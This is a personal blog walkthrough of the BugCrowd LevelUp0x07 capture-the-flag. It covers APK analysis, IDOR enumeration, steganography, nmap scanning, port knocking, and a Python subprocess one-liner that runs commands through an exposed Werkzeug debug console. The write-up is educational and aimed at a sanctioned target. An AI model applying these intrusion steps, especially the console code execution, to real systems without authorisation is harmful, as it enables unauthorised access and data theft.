LevelUp0x07 CTF Complete Walkthrough β›³

Hey guys, today I am going to show you the Walk Through for the CTF provided by BugCrowd that took place from 08/17/2020 to 08/21/2020, in this post, I will describe to you my mindset and all the strategies that I have used to retrieve all 7 flags and defeat the evil agency trying to implement the WannaSpy virus !!

Before the Challenge: I started the CTF by accessing the page provided by BugCrowd here , there they described all the rules and how the CTF is supposed to work, this step does not sound “essential” for the CTF, but it is actually very important because it is here that you can narrow a lot of tools and methods to be used on the CTF, on the description they explicitly explain that each flag varies in difficulty with the first flag being the easiest, and the last being the hardest. The format of the flag ‘flag{}’, that if you’ve found a flag it means you are in the right area and should explore your surroundings to be on the correct path to the next flag and how and where to submit all flags. I am saying that because I have seen a lot of people on the discord channel asking questions that were already on the description of the CTF showing that a fair part of the participants didn’t take the time to read the instruction and jumped right into the challenge. So that is why it is good to READ ALL INSTRUCTIONS. Nice now that we have read everything let’s go to the target provided by them πŸ™‚

  1. 1. First Flag: The only “in scope” target provided for this CTF was this URL, here you can see what looks like a terminal telling us what commands were valid, I entered the ‘brief’ command because that is what the initial message was suggesting, after entering this command a new message displays, agent cje told us that Agent Craigie was able to plant a radio at the following endpoint: /radio but before entering this endpoint I just wanted to test if I could type anything else on the terminal that could display something that it was not supposed to, for example, ‘ls’ , ‘whoami’ , ‘pwd’ , etc. But nothing was working so then I moved on to the https://07.levelupctf.com/radio page, when I entered the page it displayed a login form which was weird because it does not look like what we would expect from a /radio directory. So then as I always like to do before start using any kind of external tools or exploitation I inspected the page also taking into consideration that it was the first flag so you couldn’t expect much difficulty. I was looking for any comments that developers may leave on the page, and sure enough, the first flag was there under Network on the login.js file when I searched for the keyword ‘flag’ using the ctrl + f shortcut it displayed the first flag.
Image


2. Second Flag: Alright with the first flag down, I saw that also there was more stuff on the comment, it shows a JS function which returns this url I copied it and after pasting this on the browser it redirects me to a downloading page which was asking me to download an .APK file, after downloading, I transferred it to my google drive account in which I downloaded it on the AndroidStudio smartphone emulator which you can have a look here .

Image

I then start inspecting the app and the result was just a simple login page with an image of an open folder written confidential on it and a hidden image that if you clicked on it, a dumpster on fire would be displayed (yes when I saw that I really didn’t know how to react to it :v)

After analyzing a little more the tools and seeing that I had nothing to do on it unless to log in to an account in which I didn’t know the credentials. I used the best tool ever created to ‘reverse engineer’ an .APK file which name is MobSF, it is so good that I still can’t believe that the creators have open-sourced it and given for free, what it does is analyze the file and displays any vulnerabilities that the app has, not only that but it also organizes all files used on the apps by categories. It is so simple that it even provides a GUI, you can run it on docker by running these commands:

docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

After doing so I uploaded the apk file on it and that was the outcome:

Image

After that I literally searched the word ‘flag’ once again using the shortcut ctrl + f and there is was under the A Strings category:

Image

3. Third Flag: Now things start getting a little more interesting, after a while looking around and taking some more notes on my notepad, I remembered one of the instructions on the description of the CTF saying that if you’ve found a flag it means you are in the right area and should explore your surroundings to be on the correct path to the next flag, then I continue looking more any more hints then after inspecting the code source I found the MainActivity.java, for those new to Mobile App Bug Bounty and to those who don’t have experience at all (me) the “MainActvity.java is one of the most important files in Android Studio. It is inside this file you define methods, functions, data types and variables”. I took this quote from this video feel free to check out. I didn’t know about it so that was something that I have learned thanks to this CTF πŸ™‚ . Anyway I inspected this file and found two interesting function one that would create a url to redirect you to a “forgotpassword page”

 String URL = "https://07.levelupctf.com"; 
  public void forgotPassword(View view) throws IOException {
        EditText username = (EditText) findViewById(R.id.username);
        if (username.getText() != null && !username.getText().toString().isEmpty()) {
            OkHttpClient webclient = new OkHttpClient();
            RequestBody post_body = new FormBody.Builder().add("username", username.getText().toString()).build();
            Request.Builder builder = new Request.Builder();
            webclient.newCall(builder.url(this.URL + "/d41d8cd98f00b204e9800998ecf8427e/8cd98f00b204e9800998/forgotpassword").post(post_body).build()).execute().code();
        }

And another one that would take the keyword 3NCRYPT3D-CH4T and a key to redirect you to a chat page:

public void encryptedChat() {
        String key = getApplicationContext().getString(R.string.encrypted_chat_key);
        new OkHttpClient();
        Request.Builder builder = new Request.Builder();
        Request build = builder.url(this.URL + "/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat").header("3NCRYPT3D-CH4T", key).build();
    }

I inspected both pages,first I went to the ‘forgotpassword’ page it was asking for an username in which I didn’t know any (well I tried the agent Craigie who was the one that opened the /radio page for us and cje who described to us the debrief but nothing worked) then for the second I needed a key so I went back to the A Stings page where I had taken the second flag a searched for the ‘key’ word. And sure enough one was displayed “encrypted_chat_key” : “8b0955d2682eb74347b9e71ea0558c67” couldn’t be more obvious right πŸ˜‰ so I used curl to put all this together:

curl -H "3NCRYPT3D-CH4T:8b0955d2682eb74347b9e71ea0558c67" 
https://07.levelupctf.com/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat 
-O

I used the -O flag to save that to an external file then I opened it using FireFox (note that if you open it with another browser it may only display the raw code, and not how the page is supposed to be displayed but it does not affect the process at all , simply makes it more organized !) then I saw a chat room with 4 different users agent_nova , agent_tal , agent_521bcd5 , agent_5a247455. I took this users and used them on the ‘forgotpassword’ page and only two worked the agent_521bcd5 , agent_5a247455 for agent agent_521bcd5 it asked ‘what is the name of your favourite lion’ and for agent agent_5a247455 ‘what is your favourite hobby’. After that I went back to the chat and saw that the conversation was encrypted by a cipher, it didn’t look hard to translate because it was obvious that the words were only scrambled, then came to my mind about the Caesar cipher which was of the first encryption techniques ever created, very cool stuff recommend have a look here , then of course I searched for Ceaser cipher decoders and clicked on the first website and then started decrypting the conversation, the output was that:

– meow
-message deleted
-Have you got word on our new mission yet?
-yeah we do, check the “mission list”. they caught some HACK Agent as well.
-thats crazy, anyways check out this dope giraffe I saw at the zoo the other day:
-*shows a picture of a giraffe*
-hahahaha thats awesome

Well as we can see the only thing that looks interesting at first look is this “mission list” in which i gonna admit I spend a long time searching for a directory or hidden message about it πŸ˜…, but after a while I came back to the chat and learned a lesson to not get too excited and miss the rest of the clues, then after going back and forth I realised that agent agent_521bcd5 password reset message was asking for the name of his favourite lion and the funny thing is that he posted a photo of a giraffe so then it came to my mind to explore the metadata of the image to check if nothing was hidden in that because that is the closest think to a lion that we have right now. I used this website to check it but you can also the exiftool command that comes with kali linux. And there it was out third flag !!!

Image

4. Fourth Flag: Alright so this one I took a bit of common sense because again the hint for the next flag is always close to where you have found a flag, then I after a while I started asking myself ‘ok so agent agent_521bcd5 took this photo in a zoo and the question for his password reset is asking for the name of his favourite lion, what if I take the GPS position and used it to locate the name of the zoo and then search the name of the zoo plus the lion to see if I could find an article or a blog mentioning this lion? so that is what I did !!! got the position 37 43′ 58.53″ N, 122 30’ 8.48″ W and searched on google and it was the exact location where the San Francisco Zoo was located then I took this with me and searched for this ‘San Francisco Zoo Lion Name’ and after scrolling a little and learning that lions sleep 20 hours a day (guess I could be a lion) there was an article mentioning the lion Jahari and his death after being 16 years old, then I took this name and typed on the ‘forgotpassword’ page as agent_521bcd5 and there it was the password to log to his account :0 then I went to the https://07.levelupctf.com/login page and typed user: agent_521bcd5 password: 9a76a913ee9ae8d5b2

Image

Then as any good Bug Hunter usually does I started to click on everything I could and couldn’t find any flags the only think that I had encoutered was a page with a bunch of target phothos and on some of them there were some random number on them that were useless for any use (btw that is a foreshadow 🧐) then I remembered about the /radio endpoint that the agent Craigie left to us and then went there but this time logged as agent_521bcd5 and tah dah a message start displaying with a really nice effect of a 2003 hacker movie (I even went to the source of the page to see what layout or technique they were using and after some searching here is the bootstrap layout used for those interested ) our Fourth Flag.

Image

5.Fifth Flag: For this one, I have spend a long time on that link provided by them explaining “how to exfiltrate via ping” I would say at least a few hours ,really, I was fully dedicated to it, but in the end I saw that it was pointless and that the flag was probably somewhere else, I stopped and said alright the tip for the next flag is always close to the recent flag that you have got, if the link provided seems pointless for this flag let’s try to use the other tips that the agent fave to us First tip: obelisk hides missions in images Second Tip: pwn3llthebugz ok I got these two things then started downloading all target photos provided by them and checked one by one to see if there was anything hidden in the metadata and nothing interesting was found, then later I used the only other technique that I know of that servs the purpose to hide stuff in images that it is called Steganographic I went to this website to decode it and used the secret provided by the agent as the password but again nothing seemed to work, then after taking a rest because I got really stressed on this part πŸ˜… , I asked on the discord server for a tip for this flag and then I menssage a really nice guy in which explained to me that not all agents were being displayed !!! After some reflection, I finally understood that he was referring to an IDOR Bug I asked him that and he confirmed !!! IDOR happens when for example on the URL of a website you are logged as user 1 and it displays www.mywebsite.com/?=user1 and then you modify to /?=user2 and all information that you weren’t supposed to see from user 2 because you are logged as user 1 is shown to you. Then I started iterating on all agents because as shown on their URLs all of them had this format https://07.levelupctf.com/agents/agent01.jpg, https://07.levelupctf.com/agents/agent02.jpg, https://07.levelupctf.com/agents/agent03.jpg, etc. After almost giving up and seeing a lot of blank pages I finally found agent 87 and was able to download his image (Was this the most efficient way to do that ? probably not but it worked ! I got goosebumps when it happened to me ) then I repeated the same process as I did with the other agents and finally, I had my hands on flag number five after using the steganographic technique image:agent87.jpg (the image was in jpg but the site was asking for a jpeg format so I changed it) password: pwn3llthebugz. The message that displayed the flag was:

Dear agent_521bcd5,

        As ordered by Matriarch, I have created a backdoor console that will allow us to launch WannaSpy when time is right.

        We're not worried about anyone getting in since they have to go through many doors to actually get in.

        Once you are ready, you will find that the console lives on 3389.

        FLAG{sensored}

        Regards
        agent_1337

6.Sixth Flag: This one was the hardest in my opinion because I had to learn a technique that I had never heard about before !!! Ok, so I started by trying to interpret the message. I read line by line ad tried to understand what the agent_1337 was talking about, I understood that by ‘door’ she meant something like ports because that is the term that I usually use to explain to people what ports are, then once I was ready I would find out that the console lives on port 3389 (maybe RDP !?) then I went straight to Nmap and scanned the website to see what parts were open and if I could at least understand what she meant by all that.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 23:53 EEST
Nmap scan report for 07.levelupctf.com (165.227.54.122)
Host is up (0.18s latency).
Not shown: 65524 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
135/tcp   filtered msrpc
136/tcp   filtered profile
137/tcp   filtered netbios-ns
138/tcp   filtered netbios-dgm
139/tcp   filtered netbios-ssn
443/tcp   open     https
445/tcp   filtered microsoft-ds
3389/tcp  filtered ms-wbt-server
11211/tcp filtered memcache

That was the output, I messed around by trying to connect to them try to squeazy any information that I could from that, to be honest in the end was not worth the time at all, then here I go to the discord again to see if anyone was struggling with the same issue, then I started seeing some people mentioning things about ports and knocking on the chat room !?!? Then I thought well it kinda makes sense because the agent was talking about doors and knocking is usually what we do with it right !? oh well, sure enough, I learned something new Door Knocking !!! this is a security technique used to hide ports, but after you ‘knock’ a certain sequence of the ports for example 123, 568, 8999 port *** will open, that is a very nice technique that was a very nice technique that I was for sure surprised by. Alright now, what !? what do I figure out what ports to knock !? well… remember that foreshadow that I was talking about those random numbers well here they come. These numbers were bothering for some time already because I could see a way to use them but then after thinking about all that they all had the length of ports and were nicely positioned in a way that could mean the sequence of the knock. After searching a little more what tools to use I came across this tool that it is used to do especially that, then I kneeled and start typing the code as if there was no tomorrow:

knock 165.227.54.122 1337 415 2099 921 3389  #i had gotten the ip of the website during the nmap scan

but at first when I accessed the page 165.227.54.122:3389 it didn’t work so I kept trying random port position

knock 165.227.54.122 1337 415 2099 921 
knock 165.227.54.122 415 1337 2099 921 3389
knock 165.227.54.122 2099 415 1337 921 3389

and after only a few tries (I think that the server was with a delay and the first command was actually right) I had access to that page !!!

Image

Then again I had to interpret another message, it says that they are still building it which means that it is available but we are not suppose to access it ?! but wait wasn’t there suppose to have a CONSOLE here as agent_1337 mentioned to us before ? then I started to write random endpoints that could be where a terminal is storage like 165.227.54.122:3389/terminal, 165.227.54.122:3389/command, 165.227.54.122:3389/control, 165.227.54.122:3389/bash, …….. , 165.227.54.122:3389/console πŸ™‚

Image

And there it was in its glory, the thing that I was waiting for the whole time the terminal !!! From now on it wasn’t hard compared to what we have done so far it said in the bottom right corner of the page that it is a Werkzeug Console so the first thing that I thought about was to import the subprocess library from python and see if a could get the files from the server that the console was living on, I was getting a lot of syntax and invalid errors (I still learning python πŸ˜… ) so then I proceeded to see if anybody else had done that before and of course IppSec had done something similar before on the HackTheBox – Ellingson Room, then it was just as simple as copying what he had done on his console and that is how we got our sixth flag !!!

- def run(cmd): from subprocess import getoutput;x=getoutput(cmd);print(x,end='\n')
- run('ls -la')
- run('flag.txt')
Image

7. Seventh Flag: This last one there is way easier compared to the last flag that was “a surprise to be sure but a welcome one!” because as they had described the difficulty would increase by each flag you get, maybe they just did that for us to overthink therefore being harder to solve ?!, anyway, I was searching for some kind of privesec (I usually use this resource for those interested) because I swore the last flag was under the /root folder so I started narrowing my options until I stumble with the idea to check the bash history, then after reading the log for a while I saw that the user was messing around with a file called password.txt under the /opt directory when a read the file all user credentials were there even the matriarch.

Image
My Reaction

Then of course I didn’t think twice and went to the log in page to log as matriarch and there it was, flag number 7 πŸ™‚

And that was it, after 2 whole days working on it the challenge was completed and the evil agency had been defeated !!!

I would like to give a special thanks for some users that helped with the tips and suggestions along the way:

  • @BenkoOfficial
  • CΓΉ BΓ²can
  • machineyadav

What have I learned from it:

  • One of the coolest things was Port Knocking for sure, would never expect something like that
  • Improved a lot my knowledge about how smartphone application works
  • Thinking out of the box is extremely important (as agent87 has shown to us)
  • Do not leave password in plain text XD

Extra Notes: In the end the app that they had provided to us actually didn’t have any functionality, if you typed the right credentials it would tell you to use the web interface instead.

That is it for today guys, as always, have a wonderfull day.

Istvan out 🦁

Leave a Reply :)